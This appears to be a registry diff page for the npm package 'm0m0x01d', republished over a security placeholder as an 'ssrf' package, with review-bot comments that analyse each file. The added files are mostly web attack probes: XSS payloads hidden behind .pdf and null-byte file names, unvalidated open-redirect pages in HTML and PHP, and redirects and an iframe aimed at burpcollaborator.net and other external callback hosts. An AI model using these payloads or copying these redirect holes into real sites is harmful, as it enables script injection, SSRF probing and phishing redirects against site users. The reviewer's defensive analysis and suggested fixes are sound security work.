m0m0x01d 0.0.1-security → 8.0.0
Potentially problematic release.
This version of m0m0x01d might be problematic. Click here for more details.
- package/.htaccess +8 -0
- package/file.html +13 -0
- package/package.json +8 -3
- package/redirect.svg.html +25 -0
- package/redirect.svg.php +21 -0
- package/redirect2.svg.html +11 -0
- package/test.html%00.pdf +1 -0
- package/test.pdf +0 -0
- package/test.pdf.txt +1 -0
- package/test.php +3 -0
- package/test.svg.html +1 -0
- package/test.svg.txt +1 -0
- package/test.txt +1 -0
- package/test.txt.pdf +1 -0
- package/test2.txt.pdf +1 -0
- package/testing.svg.html +1 -0
- package/xss.svg.html +4 -0
- package/xss1.svg.html +6 -0
- package/README.md +0 -5
package/.htaccess
ADDED
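--- a/package/file.html
+++ b/package/file.html
@@ -0,0 +1,13 @@
+<!DOCTYPE html>
+<html lang="en">
+<head>
+<meta charset="UTF-8">
+<meta http-equiv="X-UA-Compatible" content="IE=edge">
+<meta name="viewport" content="width=device-width, initial-scale=1.0">
+<title>Redirecting...</title>
+<meta http-equiv="refresh" content="0; url=https://40fe2e9f7b.ipv6.bypass.eu.org/">
+</head>
+<body>
+<p>If you are not redirected automatically, <a href="https://40fe2e9f7b.ipv6.bypass.eu.org/">click here</a>.</p>
+</body>
+</html>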
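Review bot: The zero-delay `<meta http-equiv="refresh">` on line 8 and the fallback link on line 11 both point at a hard-coded external host (`40fe2e9f7b.ipv6.bypass.eu.org`) that nothing in the package documents, so any origin serving this file forwards its visitors there without interaction. The same undocumented external endpoint pattern appears in the default value of `$next_url` in redirect.svg.php and in the `<iframe src>` of testing.svg.html, both on `burpcollaborator.net` subdomains. If these are test fixtures, each should say so in a leading comment such as `<!-- test fixture: redirect handling; not for production hosting -->` and use a reserved target as redirect2.svg.html does, `content="0; url=https://www.example.com"`. For triage, the three hostnames are worth recording as indicators tied to this release.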
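--- a/package/package.json
+++ b/package/package.json
@@ -1,6 +1,11 @@
 {
 "name": "m0m0x01d",
-"version": "0.0
-"description": "
-"
+"version": "8.0.0",
+"description": "ssrf",
+"main": "index.html",
+"scripts": {
+"test": "ls"
+},
+"author": "",
+"license": "ISC"
 }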
|
@@ -0,0 +1,25 @@
|
|
|
1
|
+
<!DOCTYPE html>
|
|
2
|
+
<html lang="en">
|
|
3
|
+
<head>
|
|
4
|
+
<meta charset="UTF-8">
|
|
5
|
+
<meta name="viewport" content="width=device-width, initial-scale=1.0">
|
|
6
|
+
<title>Redirect</title>
|
|
7
|
+
<script>
|
|
8
|
+
window.onload = function() {
|
|
9
|
+
// Get the URL query parameter
|
|
10
|
+
const urlParams = new URLSearchParams(window.location.search);
|
|
11
|
+
const targetUrl = urlParams.get('url');
|
|
12
|
+
|
|
13
|
+
// If a valid URL is provided, redirect to it
|
|
14
|
+
if (targetUrl) {
|
|
15
|
+
window.location.href = targetUrl;
|
|
16
|
+
} else {
|
|
17
|
+
document.body.innerHTML = "No URL provided for redirection.";
|
|
18
|
+
}
|
|
19
|
+
}
|
|
20
|
+
</script>
|
|
21
|
+
</head>
|
|
22
|
+
<body>
|
|
23
|
+
</body>
|
|
24
|
+
</html>
|
|
25
|
+
|
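Review bot: `targetUrl` on line 15 is assigned to `window.location.href` after only a truthiness check, although the comment on line 13 says "valid URL"; any scheme and any host supplied in the `url` query parameter is followed, which makes the page an open redirect and lets a `javascript:` value run script in the hosting origin. The value should be parsed and restricted before navigation, for example `const dest = new URL(targetUrl, window.location.origin);` followed by `if (dest.origin === window.location.origin) window.location.assign(dest.href);`. The `else` branch on line 17 would also read better with `textContent` than `innerHTML`, even though the string there is constant. The file header is missing from this rendering; the hunk's 25 lines match `package/redirect.svg.html +25 -0` in the file list.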
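--- a/package/redirect.svg.php
+++ b/package/redirect.svg.php
@@ -0,0 +1,21 @@
+<?php
+// Get the target URL from the 'next_url' query parameter
+$next_url = isset($_GET['next_url']) ? $_GET['next_url'] : 'https://9lv13zw73wdy5t6hjxcpw5tz9qfh36.burpcollaborator.net';
+
+// Set the appropriate headers for the 302 redirect
+header("HTTP/1.1 302 Found");
+header("Location: $next_url");
+
+// Optional: Set additional headers if required
+header("Cache-Control: public, max-age=0");
+header("Set-Cookie: sites=; expires=Thu, 01 Jan 1970 00:00:00 GMT; Max-Age=0; Path=/");
+header("Set-Cookie: sessionid=; expires=Thu, 01 Jan 1970 00:00:00 GMT; Max-Age=0; Path=/");
+header("Strict-Transport-Security: max-age=31536000; includeSubDomains; preload");
+header("X-Frame-Options: SAMEORIGIN");
+header("X-XSS-Protection: 1; mode=block");
+header("X-Content-Type-Options: nosniff");
+header("Content-Security-Policy: frame-ancestors 'self'; base-uri 'self'; form-action 'self' https://*.example.com; upgrade-insecure-requests");
+
+// Ensure the connection is closed after the headers
+exit();
+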
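Review bot: `$next_url` on line 3 flows from `$_GET['next_url']` into the `Location` header on line 7 with no validation, so the script redirects to whatever address the caller names, and the hardening headers set afterwards do nothing to constrain that. Separately, `header()` replaces an earlier header of the same name by default, so the `Set-Cookie` call on line 12 overwrites the one on line 11 and only `sessionid` is cleared; the second call needs `false` as its second argument. The comment on line 19 is also inaccurate, since `exit()` ends the script rather than closing the connection. A sketch that restricts the target to same-site paths follows.

```php
// Accept only a same-site absolute path; anything else falls back to "/".
$next_url = isset($_GET['next_url']) ? $_GET['next_url'] : '/';
if (!is_string($next_url) || !preg_match('#^/(?![/\\\\])[^\r\n]*\z#', $next_url)) {
    $next_url = '/';
}

// … unchanged: 302 status line, Location header, Cache-Control header …
header("Set-Cookie: sites=; expires=Thu, 01 Jan 1970 00:00:00 GMT; Max-Age=0; Path=/");
// false = append instead of replacing the Set-Cookie header sent just above
header("Set-Cookie: sessionid=; expires=Thu, 01 Jan 1970 00:00:00 GMT; Max-Age=0; Path=/", false);
// … unchanged: remaining response headers and exit() …
```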
|
@@ -0,0 +1,11 @@
|
|
|
1
|
+
<!DOCTYPE html>
|
|
2
|
+
<html lang="en">
|
|
3
|
+
<head>
|
|
4
|
+
<meta charset="UTF-8">
|
|
5
|
+
<meta http-equiv="refresh" content="0; url=https://www.example.com">
|
|
6
|
+
<title>Redirecting...</title>
|
|
7
|
+
</head>
|
|
8
|
+
<body>
|
|
9
|
+
<p>If you are not redirected automatically, follow this <a href="https://www.example.com">link to the new page</a>.</p>
|
|
10
|
+
</body>
|
|
11
|
+
</html>
|
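--- a/package/test.html%00.pdf
+++ b/package/test.html%00.pdf
@@ -0,0 +1 @@
+<script>alert(document.domain)</script>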
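Review bot: The file name ends in `%00.pdf` while its only line is an HTML `<script>` element, so the declared type and the content disagree; test2.txt.pdf and test.svg.html show the same mismatch, with a script body behind a `.pdf` or stacked `.svg.html` name. Whether a host treats these as documents or as active HTML depends on how it derives the media type, which looks like the behaviour being probed, though the package does not say so. Fixtures of this kind should be documented in the README this release deletes, for instance `Test fixtures only: files intentionally carry mismatched extensions; serve with X-Content-Type-Options: nosniff and Content-Disposition: attachment.`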
package/test.pdf
ADDED
|
Binary file
|
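--- a/package/test.pdf.txt
+++ b/package/test.pdf.txt
@@ -0,0 +1 @@
+testing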
package/test.php
ADDED
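--- a/package/test.svg.html
+++ b/package/test.svg.html
@@ -0,0 +1 @@
+<script>alert(document.domain)</script>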
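--- a/package/test.svg.txt
+++ b/package/test.svg.txt
@@ -0,0 +1 @@
+testing123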
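--- a/package/test.txt
+++ b/package/test.txt
@@ -0,0 +1 @@
+testing m0m0x01d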
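--- a/package/test.txt.pdf
+++ b/package/test.txt.pdf
@@ -0,0 +1 @@
+testing123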
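--- a/package/test2.txt.pdf
+++ b/package/test2.txt.pdf
@@ -0,0 +1 @@
+<script>alert(1)</script>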
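--- a/package/testing.svg.html
+++ b/package/testing.svg.html
@@ -0,0 +1 @@
+<iframe src="https://wttobm4ubjlldge4rkkc4s1mhdn3bs.burpcollaborator.net"></iframe>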
package/xss.svg.html
ADDED
package/xss1.svg.html
ADDED
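--- a/package/README.md
+++ b/package/README.md
@@ -1,5 +0,0 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=m0m0x01d for more information.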